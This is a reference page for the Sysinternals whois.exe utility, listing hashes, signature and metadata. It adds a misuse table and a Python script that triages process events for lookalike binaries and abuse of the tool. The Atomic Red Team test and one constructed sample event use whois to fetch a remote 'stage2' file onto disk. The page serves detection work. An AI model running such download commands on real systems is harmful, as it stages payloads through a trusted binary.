whois.exe

  • File Path: C:\SysinternalsSuite\whois.exe
  • Description: Domain information lookup

Hashes

Type Hash
MD5 CC15CEBF5FF64EA1727B4DE5F3210328
SHA1 A33FB1E1E723F06FE3300DFBE731A71C297C38A1
SHA256 EA845B43C323E35DF041B8914A520F1D9643E3689454AB3049C2103458A0142D
SHA384 C3B7BA06A56BDC7978BE3EFF72BEF9F0DDB7E13AC556E371D905BA991DD1EB146FBAF52004828EFCA2EA364973E8BF20
SHA512 A4BA41795A9EF6705CD15E723FA1E36F05257C92C8256FFF74CA6EAE93305C2FBEBA008DBC49A190F07620C58D5AB59659ACB8D01AAEE9EA069B85110CA3B2D0
SSDEEP 6144:/9gygp+LcfoTLO5k634qZvl7nWCAKXpJzCos2amvBn4r:/9ip2cfoTi5R3/Zd7nWfczjZ4r
IMP 0B29BD01E42EB3C976398C7D94126E64
PESHA1 826FD7F5BA20106C4007ECAA1DC90A1D6C993C90
PE256 9595C643C605B028AF9F20136AC4BA30985E1A830B854ADD9573B7C96B1348AD

Runtime Data

Usage (stdout):

Whois v1.21 - Domain information lookup
Copyright (C) 2005-2019 Mark Russinovich
Sysinternals - www.sysinternals.com

Usage: whois [-v] domainname [whois.server]
 -v   Print whois information for referrals
 -nobanner
      Do not display the startup banner and copyright message.

Usage (stderr):

No such host is known.

Loaded Modules:

Path
C:\SysinternalsSuite\whois.exe
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\wow64.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll

Signature

  • Status: Signature verified.
  • Serial: 33000001519E8D8F4071A30E41000000000151
  • Thumbprint: 62009AAABDAE749FD47D19150958329BF6FF4B34
  • Issuer: CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: whois.exe
  • Product Name: Sysinternals Whois
  • Company Name: Sysinternals - www.sysinternals.com
  • File Version: 1.21
  • Product Version: 1.21
  • Language: English (United States)
  • Legal Copyright: Copyright (C) 2005-2019 Mark Russinovich
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/71
  • VirusTotal Link: https://www.virustotal.com/gui/file/ea845b43c323e35df041b8914a520f1d9643e3689454ab3049c2103458a0142d/detection/

Possible Misuse

The following table contains possible examples of whois.exe being misused. While whois.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source | Source File | Example | License
sigma | proc_creation_win_false_sysinternalsuite.yml | - '\whois.exe' | DRL 1.0
malware-ioc | misp-badiis.json | "description": "Adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.\n\nAdversaries can use purchased domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016)\n\nDomain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)" | © ESET 2014-2018
atomic-red-team | index.md | - T1596.002 WHOIS CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team | index.md | - Atomic Test #14: whois file download [linux, macos] | MIT License. © 2018 Red Canary
atomic-red-team | linux-index.md | - T1596.002 WHOIS CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team | linux-index.md | - Atomic Test #14: whois file download [linux, macos] | MIT License. © 2018 Red Canary
atomic-red-team | macos-index.md | - Atomic Test #14: whois file download [linux, macos] | MIT License. © 2018 Red Canary
atomic-red-team | T1105.md | - Atomic Test #14 - whois file download | MIT License. © 2018 Red Canary
atomic-red-team | T1105.md | ## Atomic Test #14 - whois file download | MIT License. © 2018 Red Canary
atomic-red-team | T1105.md | Download a remote file using the whois utility | MIT License. © 2018 Red Canary
atomic-red-team | T1105.md | \| output_file \| Path of file to save output to \| Path \| /tmp/T1105.whois.out \| | MIT License. © 2018 Red Canary
atomic-red-team | T1105.md | timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file} | MIT License. © 2018 Red Canary
atomic-red-team | T1105.md | ##### Description: The whois and timeout commands must be present | MIT License. © 2018 Red Canary
atomic-red-team | T1105.md | which whois && which timeout | MIT License. © 2018 Red Canary
atomic-red-team | T1105.md | echo "Please install timeout and the whois package" | MIT License. © 2018 Red Canary
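The two abuse patterns above (a lookalike binary named whois.exe, and the genuine tool used to pull data from an attacker-chosen server and save it to disk, as in the T1105 test) can both be triaged from process-creation telemetry using the attributes this page lists: the SHA256, the Microsoft signer, and the version metadata. The script below is an added example written for this page; it is not code from Strontic, Sysinternals, or any of the projects in the table. The events are constructed, in a simplified Sysmon-style layout; the Signed/Signature fields are assumed to have been enriched from image-load events or an Authenticode check, since Sysmon's process-creation event does not carry them itself. The two rules are illustrative heuristics and do not reproduce the logic of the referenced Sigma rule.

```python
"""Triage whois.exe process-creation events against the known-good attributes of
Sysinternals Whois v1.21 and flag T1105-style usage.

Added example; the events and the two heuristics are constructed for illustration."""
import re
import shlex

# Known-good attributes taken from the page for Sysinternals Whois v1.21.
KNOWN_SHA256 = "EA845B43C323E35DF041B8914A520F1D9643E3689454AB3049C2103458A0142D"
KNOWN_SIGNER = "Microsoft Corporation"
KNOWN_COMPANY = "Sysinternals - www.sysinternals.com"
KNOWN_ORIGINAL_FILENAME = "whois.exe"

# A cmd.exe/PowerShell stdout redirection such as "> C:\x.bin" or ">> out.txt".
REDIRECT = re.compile(r">\s*\S")


def parse_hashes(field):
    """Turn Sysmon's 'SHA1=..,MD5=..,SHA256=..' string into a dict (values upper-cased)."""
    out = {}
    for part in field.split(","):
        if "=" in part:
            key, value = part.split("=", 1)
            out[key.strip().upper()] = value.strip().upper()
    return out


def is_whois_event(event):
    """True if the process is named whois.exe or carries that OriginalFileName."""
    image_name = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    original = event.get("OriginalFileName", "").lower()
    return image_name == "whois.exe" or original == KNOWN_ORIGINAL_FILENAME


def check_integrity(event):
    """Flag a process presenting itself as whois.exe whose hash, signer or
    version metadata differ from the genuine Sysinternals binary."""
    findings = []
    if not is_whois_event(event):
        return findings
    if parse_hashes(event.get("Hashes", "")).get("SHA256") != KNOWN_SHA256:
        findings.append("sha256 mismatch")
    if event.get("Signed") != "true" or event.get("Signature") != KNOWN_SIGNER:
        findings.append("not signed by Microsoft")
    if event.get("Company") != KNOWN_COMPANY:
        findings.append("version metadata mismatch")
    image_name = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    if image_name != "whois.exe":
        findings.append("renamed binary (OriginalFileName whois.exe)")
    return findings


def check_commandline(event):
    """Flag the T1105 shape for the Sysinternals syntax
    'whois [-v] domainname [whois.server]': a second positional argument
    (an explicit server) plus output redirected to a file by the parent shell."""
    findings = []
    if not is_whois_event(event):
        return findings
    # posix=False keeps Windows backslashes literal and quotes attached to tokens.
    tokens = shlex.split(event.get("CommandLine", ""), posix=False)
    positional = [t for t in tokens[1:] if not t.startswith("-")]
    if len(positional) >= 2:
        findings.append("explicit whois server: " + positional[1].strip('"'))
    parent = event.get("ParentCommandLine", "")
    # The '>' lives in the shell that launched whois.exe, not in whois.exe's own line.
    if "whois" in parent.lower() and REDIRECT.search(parent):
        findings.append("parent shell redirects whois output to a file")
    return findings


def triage(events):
    """Return (RecordId, findings) for every event that raised at least one finding."""
    results = []
    for event in events:
        findings = check_integrity(event) + check_commandline(event)
        if findings:
            results.append((event["RecordId"], findings))
    return results


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # 1: genuine binary, ordinary lookup
        "RecordId": 1, "Image": r"C:\SysinternalsSuite\whois.exe",
        "CommandLine": "whois.exe -nobanner example.com",
        "ParentCommandLine": r'"C:\Windows\System32\cmd.exe"',
        "Hashes": "SHA256=" + KNOWN_SHA256 + ",MD5=CC15CEBF5FF64EA1727B4DE5F3210328",
        "Signed": "true", "Signature": KNOWN_SIGNER,
        "Company": KNOWN_COMPANY, "OriginalFileName": "whois.exe",
    },
    {   # 2: unsigned lookalike dropped in a user-writable path
        "RecordId": 2, "Image": r"C:\Users\Public\whois.exe",
        "CommandLine": "whois.exe example.com",
        "ParentCommandLine": r'"C:\Windows\System32\cmd.exe"',
        "Hashes": "SHA256=" + "0" * 64,
        "Signed": "false", "Signature": "", "Company": "", "OriginalFileName": "",
    },
    {   # 3: genuine binary pointed at an attacker-chosen server, reply saved to disk
        "RecordId": 3, "Image": r"C:\SysinternalsSuite\whois.exe",
        "CommandLine": r'"C:\SysinternalsSuite\whois.exe" -nobanner stage2 203.0.113.10',
        "ParentCommandLine": r'cmd.exe /c "C:\SysinternalsSuite\whois.exe" -nobanner stage2 203.0.113.10 > C:\Users\Public\stage2.bin',
        "Hashes": "SHA256=" + KNOWN_SHA256,
        "Signed": "true", "Signature": KNOWN_SIGNER,
        "Company": KNOWN_COMPANY, "OriginalFileName": "whois.exe",
    },
]

if __name__ == "__main__":
    for record_id, findings in triage(SAMPLE_EVENTS):
        print(record_id, findings)
```

Two caveats when adapting this. The `-h`/`-p` syntax in the Atomic test is the Unix whois client's; the Sysinternals build's usage (shown above) only takes an optional trailing `whois.server` argument, which is why the server check looks at the second positional token. And a SHA256 mismatch on its own may simply mean a newer Sysinternals release, so refresh the hash allowlist before treating it as an indicator; the signer and OriginalFileName checks carry more weight.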

MIT License. Copyright (c) 2020-2021 Strontic.